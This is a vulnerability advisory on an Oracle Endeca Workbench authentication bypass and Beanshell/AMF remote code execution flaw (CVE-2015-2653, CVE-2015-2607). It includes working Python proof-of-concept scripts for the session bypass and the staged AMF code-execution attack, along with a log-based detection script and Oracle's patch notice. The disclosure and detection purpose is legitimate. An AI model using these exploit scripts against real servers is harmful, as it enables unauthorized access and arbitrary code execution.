SSD Advisory – Oracle Endeca Workbench (CAS) Beanshell Script Remote Code Execution / Session Generation Authentication Bypass

SecuriTeam Secure Disclosure
SecuriTeam Secure Disclosure (SSD) provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers for researchers and will give you the fast response and great support you need to make top dollar for your discoveries.
Introduction
Oracle Endeca's Web commerce solution (now called Oracle Commerce Guided Search/Experience Manager) enables your company to deliver a personalized, consistent customer buying experience across all channels — online, in-store, mobile, or social. Whenever and wherever customers engage with your business, the Oracle Endeca Web commerce solution delivers, analyzes, and targets just the right content to just the right customer to encourage clicks and drive business results.
Vulnerability Details
A vulnerability in the session generation mechanism allows unauthenticated users to obtain an "authenticated" session by requesting a page with certain parameters. A vulnerability in the /casconsole/messagebroker/amf endpoint allows an attacker who can craft a custom Action Message Format (AMF) request to make the remote server execute arbitrary code.
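As an added example (not part of the SSD advisory or of Oracle's code), the following Python detection logic scans constructed web-server access log lines for the two request patterns the PoCs below rely on: a request to /casconsole/ carrying both the timestamp and auth query parameters (the session-generation bypass) followed, from the same client, by a POST to /casconsole/messagebroker/amf. The Combined Log Format, the sample lines and the ten-minute correlation window are assumptions.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Combined Log Format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jul/2015:14:02:11 +0000] "HEAD /casconsole/?timestamp=1&auth=90 HTTP/1.1" 200 0 "-" "python-requests/2.7"
10.0.0.5 - - [10/Jul/2015:14:02:19 +0000] "POST /casconsole/messagebroker/amf HTTP/1.1" 200 512 "-" "python-requests/2.7"
10.0.0.9 - - [10/Jul/2015:14:05:00 +0000] "GET /casconsole/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jul/2015:14:05:03 +0000] "POST /casconsole/messagebroker/amf HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')
AMF_PATH = "/casconsole/messagebroker/amf"

def parse_line(line):
    """Return (ip, time, method, path, query) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(target)
    return ip, when, method, parts.path, parse_qs(parts.query)

def is_session_bypass(path, query):
    # The bypass request in the advisory hits /casconsole/ with both the
    # timestamp and auth parameters; a normal console visit carries neither.
    return path == "/casconsole/" and "timestamp" in query and "auth" in query

def find_suspicious_clients(log_text, window=timedelta(minutes=10)):
    """IPs that sent a bypass-style request and then POSTed to the AMF endpoint within the window."""
    last_bypass = {}   # ip -> time of the most recent bypass-style request
    flagged = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, when, method, path, query = rec
        if is_session_bypass(path, query):
            last_bypass[ip] = when
        elif method == "POST" and path == AMF_PATH and ip in last_bypass:
            if when - last_bypass[ip] <= window and ip not in flagged:
                flagged.append(ip)
    return flagged

if __name__ == "__main__":
    for ip in find_suspicious_clients(SAMPLE_LOG):
        print("bypass-style session request followed by AMF POST from", ip)
```

On the constructed sample only 10.0.0.5 is flagged; 10.0.0.9 posts to the AMF endpoint but never sent the parameterised /casconsole/ request.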

Vulnerable Version
Oracle Endeca Workbench (CAS) version 3.1.2.797565
Session Generation Authentication Bypass
Sample Run of the PoC (screenshot: poc-authbypass)

#!/usr/bin/python
#
import requests
import sys
import re
# in case you want a proxy
http_proxy  = "http://127.0.0.1:8080"
proxy = {"http" : http_proxy}
def header():
    header = """
    Oracle Endeca Workbench (CAS) v3.1.2.797565 Session Generation Authentication Bypass
    x 2014
    """
    return header
if len(sys.argv) <= 1:
    print header()
    print "usage: %s [target]" % (sys.argv[0])
    print "eg: %s 192.168.51.130" % (sys.argv[0])
    sys.exit(1)
target = sys.argv[1]
print header()
print "(+) Generating a remote sessionid..."
url = "http://%s:8006/casconsole/?timestamp=1&auth=90" % target
r = requests.head(url, proxies=proxy)
match = re.search("ESESSIONID=(.*); Path=/casconsole", r.headers['set-cookie'])
if match:
    print "(+) Great! we have a session: %s" % match.group(1)

Remote Code Execution Vulnerability
Sample Run of the PoC (screenshot: poc-rce)

#!/usr/bin/python
#
import requests
import sys
from re import search
from os import system
def header():
    header = """
    Oracle Endeca Workbench (CAS) v3.1.2.797565 Beanshell Script Remote Code Execution
    x 2014
    """
    return header
if len(sys.argv) <= 2:
    print header()
    print "usage: %s [target] [sessionid]" % (sys.argv[0])
    print "eg: %s 192.168.51.130 E78A2028CC999F917B2BF984E1410CA7" % (sys.argv[0])
    sys.exit(1)
# in case you want a proxy
http_proxy  = "http://127.0.0.1:8080"
proxy = {"http" : http_proxy}
s = requests.session()
target    = sys.argv[1]
sessionid = sys.argv[2]
print header()
url = "http://%s:8006/casconsole/messagebroker/amf" % target
headers = { 'Content-Type': 'application/x-amf',                         # AMF content type
            'Cookie': 'ESESSIONID=%s' % sessionid,     # this is the session ID we generated
          }
stage1 = open('amf_stage1.dat', 'r')
post_s1 = stage1.read()
stage1.close()
print "(+) Sending our Stage1 SOAPMessage via amf"
r = requests.post(url, data=post_s1, headers=headers, proxies=proxy)
# we created the crawl
if search("createCrawlResponse", r.text):
    print "(+) Successfully created the remote datasource using a SOAPMessage via amf"
    stage2 = open('amf_stage2.dat', 'r')
    post_s2 = stage2.read()
    stage2.close()
    print "(+) Sending our Stage2 SOAPMessage via amf"
    r = requests.post(url, data=post_s2, headers=headers, proxies=proxy)
    # we started our code
    if search("startCrawlResponse", r.text):
        print "(+) Successfully started calc.exe using a SOAPMessage via amf"

Vendor Response

The following issues reported by you are fixed in the upcoming Critical Patch Update, due to be released at 1:00 PM, U.S. Pacific Time, on July 14, 2015. We ask that any information that you plan to publish regarding these issues be released after this date and time.
This Critical Patch Update will contain fixes for the following issues:
S0540546 ENDECA WORKBENCH REMOTE CODE EXECUTION
S0540533 ENDECA WORKBENCH AUTHENTICATION BYPASS

CVE
Two CVEs have been assigned to these two vulnerabilities: CVE-2015-2653 and CVE-2015-2607.